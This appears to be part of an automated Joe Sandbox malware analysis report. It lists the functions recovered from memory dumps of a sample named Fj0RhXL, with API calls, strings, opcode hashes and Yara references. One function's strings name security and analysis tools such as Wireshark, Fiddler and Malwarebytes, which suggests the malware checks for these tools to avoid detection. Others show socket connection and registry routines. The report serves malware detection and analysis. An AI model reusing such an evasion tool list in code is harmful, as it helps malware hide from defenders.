API ID: VisibleWindow
String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
API String ID: 1208467747-3439171801
Opcode ID: b0037680cbfd05093ff65a82e22fcad08c99b56e7833e6080c698a8acd00f99e
Instruction ID: 8def35370d12bcede1089e4e9cc79551b6a0dacb3eccb970bfcd3260f8ccb7a9
Opcode Fuzzy Hash: b0037680cbfd05093ff65a82e22fcad08c99b56e7833e6080c698a8acd00f99e
Instruction Fuzzy Hash: 73418066E4172066EE21FA313E07EDF315C5D628E6F0C00A6FD19EC205F666F21980FA

Function 03D8A300 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 331COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8A357
std::_Xinvalid_argument.LIBCPMT ref: 03D8A37A
_memmove.LIBCMT ref: 03D8A3D5
_memmove.LIBCMT ref: 03D8A401
_memmove.LIBCMT ref: 03D8A434
_memmove.LIBCMT ref: 03D8A4A4
_memmove.LIBCMT ref: 03D8A50C
_memmove.LIBCMT ref: 03D8A5DC
std::_Xinvalid_argument.LIBCPMT ref: 03D8A610

Strings

invalid string position, xrefs: 03D8A60B
string too long, xrefs: 03D8A352, 03D8A375

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: f012571de69ee2008de356dc4ea735802ed05ed37a0fcfac38dbff86137e5dd6
Instruction ID: 5fdd934cb16aa02d71500794bfa18892e61dd4f1bddff0a23d6588b27ca24aab
Opcode Fuzzy Hash: f012571de69ee2008de356dc4ea735802ed05ed37a0fcfac38dbff86137e5dd6
Instruction Fuzzy Hash: D4B15C70B00244DBDF18EF6CCC9496EB3F6EB84604B28495EE8968B785D734FD918B94

Function 03D985B0 Relevance: 22.8, APIs: 15, Instructions: 254COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,03D95581,?,?), ref: 03D985C3
SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,03D95581,?,?), ref: 03D985E2

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: aff1ddf45896797b4ab25601bc85ef9f4a24e324291b7748e26e919e74db2f13
Instruction ID: ff07728261f4a71b81125bb2973f2e0e88b5e8a4c045248ef73b2c5675dc8f38
Opcode Fuzzy Hash: aff1ddf45896797b4ab25601bc85ef9f4a24e324291b7748e26e919e74db2f13
Instruction Fuzzy Hash: 4481F4727002059BEB20DF65EC84B6AB7E4FB49B15F044A6AE949CB740EB71E540C7E0

Function 03D972B0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D9730D
_memset.LIBCMT ref: 03D9731C
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 03D9733F

Part of subcall function 03D974EE: RegCloseKey.ADVAPI32(80000000,03D974CA), ref: 03D974FB
Part of subcall function 03D974EE: RegCloseKey.ADVAPI32(00000000), ref: 03D97504

Strings

%08X, xrefs: 03D974A5

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Close_memset$Open
String ID: %08X
API String ID: 4292648718-3773563069
Opcode ID: 04bc451526b052ab2f4236eb0ead024ccfaba4050bd82db4e72a57dbf0d4caac
Instruction ID: cc32ed2775705f4a2764491fb870d79fafe376043614b6f3b1b2419d7e964316
Opcode Fuzzy Hash: 04bc451526b052ab2f4236eb0ead024ccfaba4050bd82db4e72a57dbf0d4caac
Instruction Fuzzy Hash: 3E5134B2910218EBEB24EF60DC85FEE7778EB48B04F404599F615A7181E774AB44CFA4

Function 03D836C0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 03D836E0
WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03D83719
setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03D83736
setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03D83749
WSACreateEvent.WS2_32 ref: 03D8374B
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03DC433C), ref: 03D8375D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03DC433C), ref: 03D83769
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03DC433C), ref: 03D83788
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03DC433C), ref: 03D83794
gethostbyname.WS2_32(00000000), ref: 03D837A2
htons.WS2_32(?), ref: 03D837C8
WSAEventSelect.WS2_32(?,?,00000030), ref: 03D837E6
connect.WS2_32(?,?,00000010), ref: 03D837FB
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03DC433C), ref: 03D8380A

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
String ID:
API String ID: 1455939504-0
Opcode ID: cc3285bdb15f93b44d1812ff13c8291ca2daa6cf7f9f6cdd3eb201b78c5db222
Instruction ID: 43223bac120bac60e1755b116fd282a7d30dd7c891639569795d45e903fe2ccc
Opcode Fuzzy Hash: cc3285bdb15f93b44d1812ff13c8291ca2daa6cf7f9f6cdd3eb201b78c5db222
Instruction Fuzzy Hash: AE411276A00205EBE710EFA4DC89F7FB7B8EB48B10F144A1DF6159A3C4D674A905C761

Function 02F036E0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 02F03700
WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02F03739
setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02F03756
setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02F03769
WSACreateEvent.WS2_32 ref: 02F0376B
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02F1D990), ref: 02F0377D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02F1D990), ref: 02F03789
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02F1D990), ref: 02F037A8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02F1D990), ref: 02F037B4
gethostbyname.WS2_32(00000000), ref: 02F037C2
htons.WS2_32(?), ref: 02F037E8
WSAEventSelect.WS2_32(?,?,00000030), ref: 02F03806
connect.WS2_32(?,?,00000010), ref: 02F0381B
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02F1D990), ref: 02F0382A

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
String ID:
API String ID: 1455939504-0
Opcode ID: f3590db313adcc37e7e4df2b0dd9f987aa4e4c8f399ebbd7d9560f3b6dd34ca2
Instruction ID: 859e4d9d8880374f954550e95adb08799b4d9dc2d68b77325b5933761e18143b
Opcode Fuzzy Hash: f3590db313adcc37e7e4df2b0dd9f987aa4e4c8f399ebbd7d9560f3b6dd34ca2
Instruction Fuzzy Hash: 964151B1A40209ABE714DFA4DC89F7FB7B8EB89750F504519FB11A72C0C771A914DB60

Function 6C373C28 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 114COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C373CC4
_sprintf.LIBCMT ref: 6C373CFF
_sprintf.LIBCMT ref: 6C373D66
_sprintf.LIBCMT ref: 6C373D89

Strings

very, xrefs: 6C373D49
%s midpoint %s in %s: The merging of %s's, xrefs: 6C373CBE
Person1, xrefs: 6C373C97, 6C373C9C
%s., xrefs: 6C373D83
Person2, xrefs: 6C373CED, 6C373CF2
Most often this manifests in an independent, backward, introverted manner., xrefs: 6C373DD2
with %s's, xrefs: 6C373CF9
%s, and, xrefs: 6C373D60

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf
String ID: %s midpoint %s in %s: The merging of %s's$%s, and$%s.$Most often this manifests in an independent, backward, introverted manner.$Person1$Person2$very$with %s's
API String ID: 1467051239-2378394534
Opcode ID: eb3f9f4ac1300ce233dfc6b986b44cc31e935df4445f8740c3a5842f05841cdd
Instruction ID: 3b2b326aff2d88f14b46154671d520303e4f55a3afe14c0a612337c31b8dbf7e
Opcode Fuzzy Hash: eb3f9f4ac1300ce233dfc6b986b44cc31e935df4445f8740c3a5842f05841cdd
Instruction Fuzzy Hash: 87412371A00018DBDB20EB58CDC5FEC7775AB56308F450092D0C067A64CBBAD9A98F67

Function 6C3AADAD Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,00000506,00000000), ref: 6C3AAE00
CheckDlgButton.USER32(?,00000506,00000001), ref: 6C3AAE1B
IsDlgButtonChecked.USER32(?,00000506), ref: 6C3AAE33
CheckDlgButton.USER32(?,00000506,00000001), ref: 6C3AAE41
GetDlgItemTextA.USER32(?,0000042E,?,000000FF), ref: 6C3AAF15
IsDlgButtonChecked.USER32(?,6C45259D), ref: 6C3AAF89
EndDialog.USER32(?,00000001), ref: 6C3AAFBF
CheckDlgButton.USER32(?,00000506,00000000), ref: 6C3AB02B

Strings

color, xrefs: 6C3AAFCA
orb, xrefs: 6C3AAFE8
angle, xrefs: 6C3AAFDC

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Button$Check$Checked$DialogItemText
String ID: angle$color$orb
API String ID: 1015435179-3662719913
Opcode ID: 576249aa3929325efe10c96b3a7fbdfc38a83ed65d43e97b265718bf93bf2d48
Instruction ID: 59109febceef47fa8e501e1f486f605a73b15f924211a0650c051d8424b5e271
Opcode Fuzzy Hash: 576249aa3929325efe10c96b3a7fbdfc38a83ed65d43e97b265718bf93bf2d48
Instruction Fuzzy Hash: D7810572108305AFEB15DF91C888FAA77FCFB46319F10491EF59182580EB75946ACF62

Function 03D956D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,90594F2A), ref: 03D95718
wsprintfW.USER32 ref: 03D9574F
_memset.LIBCMT ref: 03D95767
_memset.LIBCMT ref: 03D9577A

Part of subcall function 03D89520: lstrlenW.KERNEL32(?), ref: 03D89538
Part of subcall function 03D89520: _memset.LIBCMT ref: 03D89542
Part of subcall function 03D89520: lstrlenW.KERNEL32(?), ref: 03D8954B
Part of subcall function 03D89520: lstrlenW.KERNEL32(?), ref: 03D89556

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03D9587E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 03D9592E
CloseHandle.KERNEL32(?), ref: 03D9596A

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

Part of subcall function 03D943F0: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,90594F2A,00000000,74DF2EE0,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9,00000000), ref: 03D94433
Part of subcall function 03D943F0: InitializeCriticalSectionAndSpinCount.KERNEL32(03D98D59,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D944D2
Part of subcall function 03D943F0: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94510

Strings

t1:, xrefs: 03D957B3
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 03D95749
o1:, xrefs: 03D957A2
p1:, xrefs: 03D9578E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
API String ID: 1254190970-1225219777
Opcode ID: df05395b18f9d8cc53e607d6be761c35e067ced11710256a77c38aa7873ddea2
Instruction ID: 1fac78186a43739020e885042780303ca90ec037b913abe536f9d8b42270dc53
Opcode Fuzzy Hash: df05395b18f9d8cc53e607d6be761c35e067ced11710256a77c38aa7873ddea2
Instruction Fuzzy Hash: FF6174F2504340EFE761EF64DC80AAFB7E9EB89614F004A2EF5D986240E7349544CBA2

Function 6C371E1E Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 114COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6C371E7F
_sprintf.LIBCMT ref: 6C371ED3
__floor_pentium4.LIBCMT ref: 6C371EF6
_sprintf.LIBCMT ref: 6C371F66

Strings

%c%2d%c%02d', xrefs: 6C371ECD
%c%1.4f, xrefs: 6C371F31
%c%1.7f, xrefs: 6C371F42
+ 0:00', xrefs: 6C371EC3, 6C371ED2, 6C371F5A, 6C371F65
%c%2.3f, xrefs: 6C371F38
%02d", xrefs: 6C371F0A
%c%2.6f, xrefs: 6C371F49, 6C371F64

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __floor_pentium4_sprintf
String ID: %02d"$%c%1.4f$%c%1.7f$%c%2.3f$%c%2.6f$%c%2d%c%02d'$+ 0:00'
API String ID: 4172657630-3008370106
Opcode ID: 88f3e14b38c28ddab9174bc0d5d9ae3ca2222f479f502cd701d2e07cbde9a290
Instruction ID: 3ef473cfcf29b2ee7920bb373f686cdbbdbff3f86c3d0ec53f936e4f1f077159
Opcode Fuzzy Hash: 88f3e14b38c28ddab9174bc0d5d9ae3ca2222f479f502cd701d2e07cbde9a290
Instruction Fuzzy Hash: 7E3146B3211908A7DB14AF01E815FEA3F7CEF46358F128259F88849940CB39C995CBA6

Function 6C3C9834 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 82COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 6C3C984F
_fprintf.LIBCMT ref: 6C3C988A

Strings

Maize, xrefs: 6C3C98FB
Rgb %d %d %d, xrefs: 6C3C98D8
GrayN %d, xrefs: 6C3C991D
%d %d %d %d %d %d, xrefs: 6C3C9884
DW#%d, xrefs: 6C3C9849
%s, xrefs: 6C3C98F4

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fprintf
String ID: %d %d %d %d %d %d$%s$DW#%d$GrayN %d$Maize$Rgb %d %d %d
API String ID: 1654120334-1105507515
Opcode ID: e91846658bbdb35f24bacd3070e4648530a4a99a4c788e4b652f2f7f49aea54f
Instruction ID: 12477903ba99b7b4e7799a771dcb6920fee1b391c62446c2b8a66b8d62f84229
Opcode Fuzzy Hash: e91846658bbdb35f24bacd3070e4648530a4a99a4c788e4b652f2f7f49aea54f
Instruction Fuzzy Hash: 3921D8B2B54620A5D748AB0D5C84F3F72B8D78B70CB12841EF49993D44E325AD85DEA3

Function 6C3ADCDA Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 58COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000001), ref: 6C3ADD13
_sprintf.LIBCMT ref: 6C3ADD37
SetDlgItemTextA.USER32(?,000004D5,?), ref: 6C3ADD52
_sprintf.LIBCMT ref: 6C3ADD65
SetDlgItemTextA.USER32(?,000004D6,?), ref: 6C3ADD7A

Strings

Released %s, xrefs: 6C3ADD5F
32 bit, xrefs: 6C3ADD1C
Astrolog, xrefs: 6C3ADD26
%s version %s for %s Windows, xrefs: 6C3ADD31
7.10, xrefs: 6C3ADD21
October 2020, xrefs: 6C3ADD54

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: ItemText_sprintf$Dialog
String ID: %s version %s for %s Windows$32 bit$7.10$Astrolog$October 2020$Released %s
API String ID: 3095657542-1244327326
Opcode ID: 7ff217e3a58f5301979e5c3230d8163b3584706ba5fffb17fbe0b9e541011c0b
Instruction ID: 2cf81f47841b02f206bac722a6671b2d19c2b9de5fe369df8eeb79862d91dbf1
Opcode Fuzzy Hash: 7ff217e3a58f5301979e5c3230d8163b3584706ba5fffb17fbe0b9e541011c0b
Instruction Fuzzy Hash: BE11A0B29801486BCB00EF64CC85EEE73BCEF15318F100862FA55E2940D7F4A595CE91

Function 03D84560 Relevance: 18.1, APIs: 12, Instructions: 130threadnetworksleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 03D84588
timeGetTime.WINMM ref: 03D845A9
GetCurrentThreadId.KERNEL32 ref: 03D845C9
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03D845EB
SwitchToThread.KERNEL32 ref: 03D84605
send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D8465B
SetEvent.KERNEL32(?), ref: 03D84679
InterlockedExchange.KERNEL32(?,00000000), ref: 03D84684
WSACloseEvent.WS2_32(?), ref: 03D84692
shutdown.WS2_32(?,00000001), ref: 03D846A6
closesocket.WS2_32(?), ref: 03D846B0
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 03D846E9

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSleepSwitchTimeclosesocketsendshutdowntime
String ID:
API String ID: 3362159456-0
Opcode ID: 4456cb75503a4550656531170ef5987071d4fb4ab8800ddf18a89dbdf6d7d4c6
Instruction ID: 4d5ecd4e1fe76af8002ce289eb98253813f2ba5833470c2c0860936e1625dc9a
Opcode Fuzzy Hash: 4456cb75503a4550656531170ef5987071d4fb4ab8800ddf18a89dbdf6d7d4c6
Instruction Fuzzy Hash: B741AD72600616EBC724FF66D889BAAF779FF44B10F084618E5018A684DB74F591CBE0

Function 6C368DF7 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 290COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C368E75
_sprintf.LIBCMT ref: 6C368F07
_sprintf.LIBCMT ref: 6C36906D
_sprintf.LIBCMT ref: 6C3690DB

Strings

%c%c%c, xrefs: 6C368F01
%s%5d, xrefs: 6C368E6F
-- , xrefs: 6C368FC3
--%c, xrefs: 6C3690D5
%2d%c, xrefs: 6C369067
xFl, xrefs: 6C368E3C

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf
